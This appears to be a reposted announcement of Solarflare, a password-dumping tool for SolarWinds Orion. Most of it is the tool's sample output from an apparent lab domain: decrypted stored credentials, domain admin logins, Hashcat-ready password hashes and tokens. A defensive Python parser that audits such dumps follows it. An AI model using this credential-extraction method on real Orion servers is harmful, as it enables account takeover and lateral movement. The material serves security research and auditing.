Solarflare - SolarWinds Orion Account Audit / Password Dumping Utility


News category: IT Security News
Source: feedproxy.google.com


Credential Dumping Tool for SolarWinds Orion

Blog post: https://malicious.link/post/2020/solarflare-release-password-dumper-for-solarwinds-orion/


Credit to @asolino, @gentilkiwi, and @skelsec for helping me figure out DPAPI.

============================================
| Collecting RabbitMQ Erlang Cookie
| Erlang Cookie: abcdefg12456789abcde
============================================
| Collecting SolarWinds Certificate
| SolarWinds Orion Certificate Found!
| Subject Name: CN=SolarWinds-Orion
| Thumbprint : BE85C6C3AACA8840E166187B6AB8C6BA9DA8DE80
| Password : alcvabkajp4
| Private Key : MIIKHwIBAzCCCd8GCSqGSIb3DQEHAaCCCdAEggn<snip>
============================================
| Collecting Default.DAT file
| Encrypted: 01000000D08C9DDF0115D<snip>
| Decrypted: 5D3CE5B08C9201E636BCF<snip>
============================================
| Collecting Database Credentials |
| Path to SWNetPerfMon.DB is: C:\Program Files (x86)\SolarWinds\Orion\SWNetPerfMon.DB
| Connection String: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;Password=SUPERSECRETPASSWORDHERE
| Number of database credentials found: 1
============================================
| Connecting to the Database |
| Successfully connected to: Server=(local)\SOLARWINDS_ORION;Database=SolarWindsOrion;User ID=SolarWindsOrionDatabaseUser;MultipleActiveResultSets=true
============================================
| DB - Exporting Key Table |
| KeyID: 1
| Encrypted Key: LmjknGhSXTC<snip>
| Kind: Aes256
| Purpose: master
| Protection Type: 1
| Protection Value: BE85C6C3AACA8<snip>
| Protection Details: {}
------------------------------------------------
| KeyID: 2
| Encrypted Key: //pj6a4FaCyfv/Rgs<snip>
| Kind: Aes256
| Purpose: oldcryptohelper
| Protection Type: 0
| Protection Value: 1
| Protection Details: {"IV":"oj3JCT7Cft<snip>"}
============================================
| DB - Exporting Accounts Table |
| Account: _system
| Password Hash: qE9ClH<snip>
| Password Salt: XgtO8XNWc/KiIdglGOnxvw==
| Hashcat Mode 12501: $solarwinds$1$XgtO8XNWc/KiIdglGOnxvw==$qE9ClHDI<snip>
| Account Enabled: Y
| Allow Admin: Y
| Last Login: 12/15/2020
--------------------------------------------
| Account: Admin
| Password Hash: IfAEwA7LXxOAH7ORCG0ZYeq<snip>
| Password Salt: jNhn3i2XtHfY8y4EOmNdiQ==
| Hashcat Mode 12501: $solarwinds$1$jNhn3i2XtHfY8y4EOmNdiQ==$IfAEwA7LXxOAH7ORCG0ZY<snip>
| Account Enabled: Y
| Allow Admin: Y
| Last Login: 12/02/2020
--------------------------------------------
| Account: Guest
| Password Hash: Y/EMuOWMNfCd<snip>
| Salt is NULL in DB so lowercase username is used: guest
| Hashcat Mode 12500: $solarwinds$0$guest$Y/EMuOWMNfCd<snip>
| Account Enabled: N
| Allow Admin: N
| Last Login: 12/30/1899
--------------------------------------------
| Account: iprequest
| Password Hash: 7zskGWFukuHuwQ<snip>
| Salt is NULL in DB so lowercase username is used: iprequest
| Hashcat Mode 12500: $solarwinds$0$iprequest$7zskGWFukuHuwQ<snip>
| Account Enabled: Y
| Allow Admin: N
| Last Login: 01/01/1900
--------------------------------------------
| Account: SITTINGDUCK\uberolduser
| Password: 11-417578424799297-9-6260697430795685763067724
| Decoded Password: ASDQWE123
| Hashcat Mode 21500: $solarwinds$0$admin$fF1lrlOXfxVz51Etjcs18XNK+Zt3keV2AllH9cYtGzdt5Yg2TtcsU84G9+5VVFMIUorR5eNJzX/1kmef6wZfrg==
| Account Enabled: Y
| Allow Admin: N
| Last Login: 11/15/2015
| Account SID: S-1-5-21-1000000000-2000000000-3000000000-50000
| Group: SITTINGDUCK\Domain Admins
--------------------------------------------
============================================
| DB - Exporting Credentials Table |
------------------1--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: _system
| Desc: Cortex Integration
| Owner: CORE
| Password: 9dM-5pH/&Y(KU-v
| Username: _system
------------------1--------------------------
------------------2--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: JobEngine
| Desc: Job Engine router TCP endpoint credentials
| Owner: JobEngine
| Password: +fBByxJFsK+da6ZN2wKvLTKC/PWUzFlfIvvwtW/XqvA=
| Username: KWPPhiYJmE8+fRF6qlkxulK2tf3t79TQOAk1ywBMVOI=
------------------2--------------------------
------------------3--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV2
| Name: public
| Desc:
| Owner: Orion
| Community: public
------------------3--------------------------
------------------4--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV2
| Name: private
| Desc:
| Owner: Orion
| Community: private
------------------4--------------------------
------------------5--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: Erlang cookie
| Desc: Erlang clustering cookie
| Owner: Erlang
| Password: abcdefg12456789abcde
| Username: ignored
------------------5--------------------------
------------------6--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: RabbitMQ user account
| Desc: RabbitMQ user account for Message Bus
| Owner: RabbitMQ
| Password: LtVmCrzlTNyWmwxpxJMi
| Username: orion
------------------6--------------------------
------------------7--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: snmpv3user, Context: thisisthecontext
| Desc:
| Owner: Orion
| AuthenticationKeyIsPassword: false
| AuthenticationPassword: ASDqwe123
| AuthenticationType: SHA1
| Context: thisisthecontext
| PrivacyKeyIsPassword: false
| PrivacyPassword: ASDqwe123
| PrivacyType: AES256
| UserName: snmpv3user
------------------7--------------------------
------------------8--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: rootsnmpv3, Context: newcontextv3
| Desc:
| Owner: Orion
| AuthenticationKeyIsPassword: true
| AuthenticationPassword: ASDqwe123
| AuthenticationType: MD5
| Context: newcontextv3
| PrivacyKeyIsPassword: true
| PrivacyPassword: ASDqwe123
| PrivacyType: AES128
| UserName: rootsnmpv3
------------------8--------------------------
------------------9--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainAdmin
| Desc:
| Owner: Orion
| Password: ASDqwe123
| Username: SITTINGDUCK\uberuser
------------------9--------------------------
------------------10--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainJoiner
| Desc:
| Owner: Orion
| Password: ASDqwe123
| Username: superadmin@sittingduck.info
------------------10--------------------------
------------------11--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: vesxi
| Desc: vesxi
| Owner: VIM
| Password: ASDqwe123
| Username: root
------------------11--------------------------
------------------12--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.ActiveDirectoryCredential
| Name: SITTINGDUCK\uberuser
| Desc:
| Owner: Orion
| Password: ASDqwe213
| Username: SITTINGDUCK\uberuser
------------------12--------------------------
------------------13--------------------------
| Type: SolarWinds.APM.Common.Credentials.ApmUsernamePasswordCredential
| Name: App Monitoring User
| Desc:
| Owner: APM
| Password: ASDqwe123
| Username: SITTINGDUCK\uberuser
------------------13--------------------------
------------------14--------------------------
| Type: SolarWinds.SRM.Common.Credentials.SmisCredentials
| Name: EMC_SMIS_Solarwinds
| Desc:
| Owner: SRM
| HttpPort: 5988
| HttpsPort: 5989
| InteropNamespace: /interop
| Namespace: root/emc
| Password: ASDqwe123
| Username: solarwinds
| UseSSL: true
------------------14--------------------------
------------------15--------------------------
| Type: SolarWinds.ESI.Common.Connection.ExternalSystemCredential
| Name: ESC
| Desc:
| Owner: ESI
| Password: ASDqwe123
| Username: solar_winds
------------------15--------------------------
------------------16--------------------------
| Type: SolarWinds.Orion.Web.Integration.OAuth2Token
| Name: SITTINGDUCK\uberuser
| Desc:
| Owner: Web.Integration
| AccessToken: GthQHd3<snip>
| AccessTokenExpiration: 2020-11-01T10:52:50.2768075Z
| AccessTokenIssueDate: 2020-11-01T09:52:51.2768075Z
| RefreshToken:hEyph9WqIfzm<snip>
| Scopes:
| Username: uberuser@sittingduck.info
------------------16--------------------------
------------------17--------------------------
| Type: SolarWinds.SRM.Common.Credentials.XtremIoHttpCredential
| Name: XtremIO_Admin
| Desc:
| Owner: SRM
| HttpPort: 80
| HttpsPort: 443
| Password: ASDqwe123
| Username: admin
| UseSsl: true
------------------18--------------------------
============================================
============================================
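As an added defender-side example (not part of Solarflare or the original post): a small Python parser for the tool's "| Key: Value" record format shown above, run over a constructed sample in that format, that turns a dump into audit findings a blue team acts on: accounts still stored with the legacy NULL-salt hash scheme, one password shared across several stored credentials, and SNMPv3 credentials that use MD5 authentication.

```python
# Constructed sample in Solarflare's "| Key: Value" output style (not from a real host).
SAMPLE = """\
| Account: Admin
| Password Salt: jNhn3i2XtHfY8y4EOmNdiQ==
----
| Account: Guest
| Salt is NULL in DB so lowercase username is used: guest
====
---1---
| Name: DomainAdmin
| Password: ASDqwe123
---2---
| Name: vesxi
| Password: ASDqwe123
---3---
| Name: User: rootsnmpv3, Context: newcontextv3
| AuthenticationType: MD5
====
"""

def parse_records(text):
    """One {key: value} dict per record; '===' and '---' lines close a record."""
    records, cur = [], {}
    for line in text.splitlines() + ["===="]:       # sentinel flushes the last record
        line = line.strip()
        if line.startswith(("=", "-")):
            if cur:
                records.append(cur)
            cur = {}
        elif line.startswith("| ") and ": " in line:
            key, _, val = line[2:].partition(": ")   # split on the first ": " only
            cur[key.strip()] = val.strip()
    return records

def audit(text):
    findings, by_password = [], {}
    for rec in parse_records(text):
        if "Account" in rec:                         # Accounts table record
            if "Password Salt" not in rec:           # NULL salt => username-salted legacy scheme
                findings.append(f"legacy hash scheme: {rec['Account']}")
        else:                                        # Credentials table record
            if "Password" in rec:
                by_password.setdefault(rec["Password"], []).append(rec["Name"])
            if rec.get("AuthenticationType") == "MD5":
                findings.append(f"SNMPv3 MD5 authentication: {rec['Name']}")
    for names in by_password.values():
        if len(names) > 1:
            findings.append(f"password reused by {len(names)} credentials: {', '.join(names)}")
    return findings
```

Run `audit(open("solarflare.txt").read())` on a saved dump; accounts flagged with the legacy scheme should have their passwords reset so Orion re-hashes them with a real salt.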


...

